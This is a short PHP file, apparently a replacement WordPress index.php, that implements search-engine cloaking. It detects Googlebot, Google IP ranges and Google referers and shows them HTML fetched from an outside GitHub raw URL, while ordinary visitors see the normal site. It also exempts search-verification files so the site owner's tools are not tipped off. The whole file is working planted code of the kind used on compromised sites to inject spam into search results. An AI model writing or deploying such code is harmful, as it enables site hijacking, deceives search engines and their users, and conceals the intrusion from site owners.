<?php
// ========== SKIP CLOAKING UNTUK FILE VERIFIKASI ==========
$request_uri = $_SERVER['REQUEST_URI'] ?? '';

// List file yang harus di-skip dari cloaking
$skip_files = [
    'google' => '/^\/google[0-9a-f]+\.html$/i',
    'googlex' => '/^\/googlex[0-9a-f]+\.html$/i',
    'bing' => '/^\/BingSiteAuth\.xml$/i',
    'yandex' => '/^\/yandex_[a-z0-9]+\.html$/i',
    'sitemap' => '/^\/sitemap.*\.xml$/i',
    'robots' => '/^\/robots\.txt$/i',
    'favicon' => '/^\/favicon\.ico$/i'
];

foreach ($skip_files as $pattern) {
    if (preg_match($pattern, $request_uri)) {
        // File verifikasi - biarkan WordPress menanganinya
        require_once('wp-load.php');
        exit;
    }
}

// ========== KODE CLOAKING ANDA ==========
$github_url = 'https://raw.githubusercontent.com/salmadev138/bankdataku/refs/heads/main/gojiberi.txt';

$ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
$ip = $_SERVER['REMOTE_ADDR'] ?? '';
$ref = $_SERVER['HTTP_REFERER'] ?? '';
$lang = $_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? '';

$show_cloak = false;

// Deteksi Googlebot
if (preg_match('/(Googlebot|AdsBot\-Google|Mediapartners\-Google|Google\-InspectionTool)/i', $ua)) {
    $show_cloak = true;
}

// Deteksi IP Google
$google_ips = ['66.249.', '64.233.', '216.239.', '72.14.', '209.85.'];
foreach ($google_ips as $range) {
    if (strpos($ip, $range) === 0) {
        $show_cloak = true;
        break;
    }
}

// Deteksi referer Google
if (stripos($ref, 'google.') !== false) {
    $show_cloak = true;
}

// ========== PROSES CLOAKING ==========
if ($show_cloak) {
    // Untuk Google, tampilkan konten cloaking
    $content = @file_get_contents($github_url);
    if ($content) {
        header('Content-Type: text/html; charset=UTF-8');
        echo $content;
        exit;
    }
}

// Jika bukan Google, tampilkan WordPress biasa
require_once('wp-load.php');
?>
